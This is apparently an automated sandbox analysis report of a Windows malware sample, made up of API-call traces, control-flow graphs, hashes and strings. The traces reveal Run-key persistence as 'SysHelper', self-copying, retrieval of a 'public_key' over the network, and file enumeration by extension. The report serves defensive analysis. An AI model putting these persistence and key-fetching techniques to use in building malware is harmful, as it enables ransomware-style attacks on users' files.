                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                        • API String ID: 4174345323-1723836103
                                                                                                        • Opcode ID: 72bb0da8c2557466956fec55b27a0c0aff4f3de7990ee28a52404f577923dbec
                                                                                                        • Instruction ID: d3a4c63768625251bb3fb947a49b1bf702bd4c1709ef947ebdb61794e2772a0e
                                                                                                        • Opcode Fuzzy Hash: 72bb0da8c2557466956fec55b27a0c0aff4f3de7990ee28a52404f577923dbec
                                                                                                        • Instruction Fuzzy Hash: 933261B0E0022D9ADF60AF64CC45BEEB679BF45700F0441EAE60CE6151EB749E84EF55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,00FCB3EC,000000FF), ref: 00F1E6C0
                                                                                                          • Part of subcall function 00F0C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00F1E6D4), ref: 00F0C6C2
                                                                                                          • Part of subcall function 00F0C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F0C6F3
                                                                                                          • Part of subcall function 00F0C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00F0C700
                                                                                                        • _memset.LIBCMT ref: 00F1E707
                                                                                                          • Part of subcall function 00F0C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F0C51B
                                                                                                        • InternetOpenW.WININET ref: 00F1E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F1E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F1E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F1E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F1E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F1E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F1E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F1EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F1EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F1EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F1EB86
                                                                                                        • _memset.LIBCMT ref: 00F1EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F1EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F1EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EC32
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F1EC3E
                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00F1EC51
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EC6D
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EC7F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EC93
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F1ECB3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1ED2A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1ED4B
                                                                                                        • _malloc.LIBCMT ref: 00F1ED55
                                                                                                        • _memset.LIBCMT ref: 00F1ED63
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00F1ED7D
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1ED85
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F1EDA3
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F1EDAE
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EDD3
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EDF7
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EE05
                                                                                                        • _free.LIBCMT ref: 00F1EE15
                                                                                                        • _free.LIBCMT ref: 00F1EE22
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EF61
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EFBF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 704684250-3586605218
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00F11010
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F11026
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1103B
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F11051
                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00F11059
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00F11064
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1107A
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00F11099
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F110AB
                                                                                                        • _memset.LIBCMT ref: 00F110CA
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F110DE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F110F0
                                                                                                        • _malloc.LIBCMT ref: 00F11100
                                                                                                        • _memset.LIBCMT ref: 00F1110B
                                                                                                        • _sprintf.LIBCMT ref: 00F1112E
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00F1113C
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F11154
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F1115F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 2451520719-213608013
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F11AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F11ACA
                                                                                                          • Part of subcall function 00F11AB0: DispatchMessageW.USER32(?), ref: 00F11AE0
                                                                                                          • Part of subcall function 00F11AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F11AEE
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00F0F900
                                                                                                        • _memmove.LIBCMT ref: 00F0F9EA
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00F0FA51
                                                                                                        • _memmove.LIBCMT ref: 00F0FADA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 273148273-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00FFFCA4,00000000,00000000), ref: 00F0E8CE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E8E4
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F0E8F9
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E90F
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00F0E928
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E93E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F0E95D
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E96F
                                                                                                        • _memset.LIBCMT ref: 00F0E98E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F0E9A2
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0E9B4
                                                                                                        • _sprintf.LIBCMT ref: 00F0E9D3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1084002244-213608013
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00FFFCA4,00000000,00000000,00000000,?), ref: 00F0EB01
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EB17
                                                                                                          • Part of subcall function 00F30ECA: RaiseException.KERNEL32(?,?,00F4F26B,?,?,00000000,?,?,?,?,00F4F26B,?,010081FC,?), ref: 00F30F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F0EB2C
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EB42
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00F0EB4E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EB64
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F0EB83
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EB95
                                                                                                        • _memset.LIBCMT ref: 00F0EBB4
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F0EBC8
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F0EBDA
                                                                                                        • _sprintf.LIBCMT ref: 00F0EBF4
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F0EC44
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F0EC4F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1637485200-213608013
                                                                                                        • Opcode ID: 87bc4c3b02b4f6c65e2855e3140e584e5b36258ac471f03f9442e400f21d5e49
                                                                                                        • Instruction ID: e95e2487d494d0126d34973ac839bdba5ef9c4ea9182605a4de3dc37b2d99cfd
                                                                                                        • Opcode Fuzzy Hash: 87bc4c3b02b4f6c65e2855e3140e584e5b36258ac471f03f9442e400f21d5e49
                                                                                                        • Instruction Fuzzy Hash: AC51A3B1E40209ABEF11DBA0DD46FEEBBB8FB44714F10442AF905B7180D7756A05ABA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1593 f0e670-f0e697 call f20c62 * 2 1598 f0e6b4-f0e6c2 GetAdaptersInfo 1593->1598 1599 f0e699-f0e6b3 call f21f2d call f20bed 1593->1599 1601 f0e6c4-f0e6d9 call f20bed call f20c62 1598->1601 1602 f0e6db-f0e6e8 GetAdaptersInfo 1598->1602 1601->1599 1601->1602 1603 f0e744-f0e754 call f20bed 1602->1603 1604 f0e6ea-f0e73c call f204a6 call f21f2d * 2 1602->1604 1619 f0e741 1604->1619 1619->1603
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F0E67F
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _malloc.LIBCMT ref: 00F0E68B
                                                                                                        • _wprintf.LIBCMT ref: 00F0E69E
                                                                                                        • _free.LIBCMT ref: 00F0E6A4
                                                                                                          • Part of subcall function 00F20BED: HeapFree.KERNEL32(00000000,00000000,?,00F2507F,00000000,00F2500D,?,00F23F7C,?,00F1E6CC,00000000), ref: 00F20C01
                                                                                                          • Part of subcall function 00F20BED: GetLastError.KERNEL32(00000000,?,00F2507F,00000000,00F2500D,?,00F23F7C,?,00F1E6CC,00000000,?,?,?,?,?,00FCB3EC), ref: 00F20C13
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F0E6B9
                                                                                                        • _free.LIBCMT ref: 00F0E6C5
                                                                                                        • _malloc.LIBCMT ref: 00F0E6CD
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F0E6E0
                                                                                                        • _sprintf.LIBCMT ref: 00F0E720
                                                                                                        • _wprintf.LIBCMT ref: 00F0E732
                                                                                                        • _wprintf.LIBCMT ref: 00F0E73C
                                                                                                        • _free.LIBCMT ref: 00F0E745
                                                                                                        Strings
                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00F0E71A
                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00F0E699
                                                                                                        • Address: %s, mac: %s, xrefs: 00F0E72D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                        • Opcode ID: 70217b88eb220b8eb055492249cf06a9c886e4348b492110d034d8dca8e80d62
                                                                                                        • Instruction ID: e79d58273e21891e45f0b390099181a04a113a2202ed784827ddf2dae56757ad
                                                                                                        • Opcode Fuzzy Hash: 70217b88eb220b8eb055492249cf06a9c886e4348b492110d034d8dca8e80d62
                                                                                                        • Instruction Fuzzy Hash: C11124B39445647AD272A2B56C02FFF36DC8F86711F040169FA98D5142EE5D5A0473B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1997 f0fb98-f0fb9f 1998 f0fba0-f0fbb9 1997->1998 1998->1998 1999 f0fbbb-f0fbcf 1998->1999 2000 f0fbd1 1999->2000 2001 f0fbd3-f0fc02 PathAppendW call f18400 1999->2001 2000->2001 2004 f0fc04-f0fc0c call f22587 2001->2004 2005 f0fc0f-f0fc29 2001->2005 2004->2005 2007 f0fc49-f0fc4c 2005->2007 2008 f0fc2b-f0fc2f 2005->2008 2011 f0fc4f-f0fc6b PathFileExistsW 2007->2011 2010 f0fc31-f0fc47 call f205a0 2008->2010 2008->2011 2010->2011 2013 f0fc6d-f0fc86 call f20c62 2011->2013 2014 f0fcdf-f0fce5 2011->2014 2024 f0fc88 2013->2024 2025 f0fc8a-f0fc9f lstrcpyW 2013->2025 2016 f0fcf0-f0fd07 call f17140 2014->2016 2017 f0fce7-f0fced call f22587 2014->2017 2026 f0fd09 2016->2026 2027 f0fd0b-f0fd20 FindFirstFileW 2016->2027 2017->2016 2024->2025 2028 f0fca1 2025->2028 2029 f0fca3-f0fcdc lstrcatW call f14690 call f0f0e0 call f20bed 2025->2029 2026->2027 2030 f0fd30-f0fd4c 2027->2030 2031 f0fd22-f0fd2d call f22587 2027->2031 2028->2029 2029->2014 2035 f0fd52-f0fd55 2030->2035 2036 f10072-f10076 2030->2036 2031->2030 2041 f0fd60-f0fd6b 2035->2041 2037 f10086-f100a4 2036->2037 2038 f10078-f10083 call f22587 2036->2038 2043 f100b1-f100c9 2037->2043 2044 f100a6-f100ae call f22587 2037->2044 2038->2037 2046 f0fd70-f0fd76 2041->2046 2050 f100d6-f100ee 2043->2050 2051 f100cb-f100d3 call f22587 2043->2051 2044->2043 2052 f0fd96-f0fd98 2046->2052 2053 f0fd78-f0fd7b 2046->2053 2063 f100f0-f100f8 call f22587 2050->2063 2064 f100fb-f1010b 2050->2064 2051->2050 2060 f0fd9b-f0fd9d 2052->2060 2057 f0fd92-f0fd94 2053->2057 2058 f0fd7d-f0fd85 2053->2058 2057->2060 2058->2052 2062 f0fd87-f0fd90 2058->2062 2065 f10052-f10065 FindNextFileW 2060->2065 2066 f0fda3-f0fdae 2060->2066 2062->2046 2062->2057 2063->2064 2065->2041 2069 f1006b-f1006c FindClose 2065->2069 2067 f0fdb0-f0fdb6 2066->2067 2070 f0fdd6-f0fdd8 2067->2070 2071 f0fdb8-f0fdbb 2067->2071 2069->2036 2075 f0fddb-f0fddd 
2070->2075 2073 f0fdd2-f0fdd4 2071->2073 2074 f0fdbd-f0fdc5 2071->2074 2073->2075 2074->2070 2076 f0fdc7-f0fdd0 2074->2076 2075->2065 2077 f0fde3-f0fdea 2075->2077 2076->2067 2076->2073 2078 f0fdf0-f0fe71 call f17140 call f15ae0 call f14690 call f13b70 2077->2078 2079 f0fec2-f0fecc 2077->2079 2101 f0fe81-f0fea9 2078->2101 2102 f0fe73-f0fe7e call f22587 2078->2102 2081 f0feda-f0fede 2079->2081 2082 f0fece-f0fed5 call f11ab0 2079->2082 2081->2065 2085 f0fee4-f0ff13 call f14690 2081->2085 2082->2081 2091 f0ff15-f0ff17 2085->2091 2092 f0ff19-f0ff1f 2085->2092 2093 f0ff31-f0ff6a call f15ae0 PathFindExtensionW 2091->2093 2094 f0ff22-f0ff2b 2092->2094 2103 f0ff9a-f0ffa8 2093->2103 2104 f0ff6c 2093->2104 2094->2094 2096 f0ff2d-f0ff2f 2094->2096 2096->2093 2101->2065 2108 f0feaf-f0febd call f22587 2101->2108 2102->2101 2106 f0ffda-f0ffde 2103->2106 2107 f0ffaa 2103->2107 2109 f0ff70-f0ff74 2104->2109 2115 f0ffe0-f0ffe9 2106->2115 2116 f1003a-f10042 2106->2116 2111 f0ffb0-f0ffb4 2107->2111 2108->2065 2113 f0ff76-f0ff78 2109->2113 2114 f0ff7a 2109->2114 2117 f0ffb6-f0ffb8 2111->2117 2118 f0ffba 2111->2118 2120 f0ff7c-f0ff88 call f21c02 2113->2120 2114->2120 2123 f0ffeb 2115->2123 2124 f0ffed-f0fff9 call f21c02 2115->2124 2121 f10044-f1004c call f22587 2116->2121 2122 f1004f 2116->2122 2125 f0ffbc-f0ffce call f21c02 2117->2125 2118->2125 2135 f0ff93 2120->2135 2136 f0ff8a-f0ff8f 2120->2136 2121->2122 2122->2065 2123->2124 2124->2116 2133 f0fffb-f1000b 2124->2133 2125->2116 2140 f0ffd0-f0ffd5 2125->2140 2138 f1000d 2133->2138 2139 f1000f-f10026 call f21c02 2133->2139 2137 f0ff97 2135->2137 2136->2109 2141 f0ff91 2136->2141 2137->2103 2138->2139 2139->2116 2145 f10028-f10035 call f111c0 2139->2145 2140->2111 2143 f0ffd7 2140->2143 2141->2137 2143->2106 2145->2116
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3232302685-0
                                                                                                        • Opcode ID: 77c18a6d376090ec699f8a1dfff0ee5fb2a6f2a68aff4ee6c3f5ecb6d67f0e05
                                                                                                        • Instruction ID: de1ae6cac710b94028ffbd98c618718501e9baf6f6070b82dde0ff8985814bf9
                                                                                                        • Opcode Fuzzy Hash: 77c18a6d376090ec699f8a1dfff0ee5fb2a6f2a68aff4ee6c3f5ecb6d67f0e05
                                                                                                        • Instruction Fuzzy Hash: 68B17F70D00219DBDF20DFA4DC46BDEB7B5BF14308F144069E409AB291EB759A89EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 985 f11cd0-f11d1a call f2f7c0 RegOpenKeyExW 988 f11d20-f11d8d call f2b420 RegQueryValueExW RegCloseKey 985->988 989 f12207-f12216 985->989 992 f11d93-f11d9c 988->992 993 f11d8f-f11d91 988->993 995 f11da0-f11da9 992->995 994 f11daf-f11dcb call f15c10 993->994 999 f11dd1-f11df8 lstrlenA call f13520 994->999 1000 f11e7c-f11e87 994->1000 995->995 996 f11dab-f11dad 995->996 996->994 1006 f11e28-f11e2c 999->1006 1007 f11dfa-f11dfe 999->1007 1002 f11e94-f11f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 f11e89-f11e91 call f22587 1000->1003 1014 f11f36-f11f38 1002->1014 1015 f11f3a-f11f3f 1002->1015 1003->1002 1012 f11e3c-f11e50 PathFileExistsW 1006->1012 1013 f11e2e-f11e39 call f22587 1006->1013 1010 f11e00-f11e08 call f22587 1007->1010 1011 f11e0b-f11e23 call f145a0 1007->1011 1010->1011 1011->1006 1012->1000 1021 f11e52-f11e57 1012->1021 1013->1012 1019 f11f4f-f11f96 call f15c10 RpcStringFreeW PathAppendW CreateDirectoryW 1014->1019 1020 f11f40-f11f49 1015->1020 1032 f11f98-f11fa0 1019->1032 1033 f11fce-f11fe9 1019->1033 1020->1020 1027 f11f4b-f11f4d 1020->1027 1022 f11e59-f11e5e 1021->1022 1023 f11e6a-f11e6e 1021->1023 1022->1023 1028 f11e60-f11e65 call f14690 1022->1028 1023->989 1030 f11e74-f11e77 1023->1030 1027->1019 1028->1023 1034 f121ff-f12204 call f22587 1030->1034 1035 f11fa2-f11fa4 1032->1035 1036 f11fa6-f11faf 1032->1036 1038 f11feb-f11fed 1033->1038 1039 f11fef-f11ff8 1033->1039 1034->989 1040 f11fbf-f11fc9 call f15c10 1035->1040 1042 f11fb0-f11fb9 1036->1042 1043 f1200f-f12076 call f15c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1038->1043 1044 f12000-f12009 1039->1044 1040->1033 1042->1042 1046 f11fbb-f11fbd 1042->1046 1050 f121d1-f121d5 1043->1050 1051 f1207c-f12107 call f2b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 
1043->1051 1044->1044 1048 f1200b-f1200d 1044->1048 1046->1040 1048->1043 1053 f121e2-f121fa 1050->1053 1054 f121d7-f121df call f22587 1050->1054 1059 f12115-f121a8 call f2b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1059 1060 f12109-f12110 call f13260 1051->1060 1053->989 1055 f121fc 1053->1055 1054->1053 1055->1034 1064 f121b2-f121b8 1059->1064 1065 f121aa-f121b0 GetLastError 1059->1065 1060->1059 1066 f121c0-f121cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FCAC68,000000FF), ref: 00F11D12
                                                                                                        • _memset.LIBCMT ref: 00F11D3B
                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F11D63
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FCAC68,000000FF), ref: 00F11D6C
                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F11DD6
                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F11E48
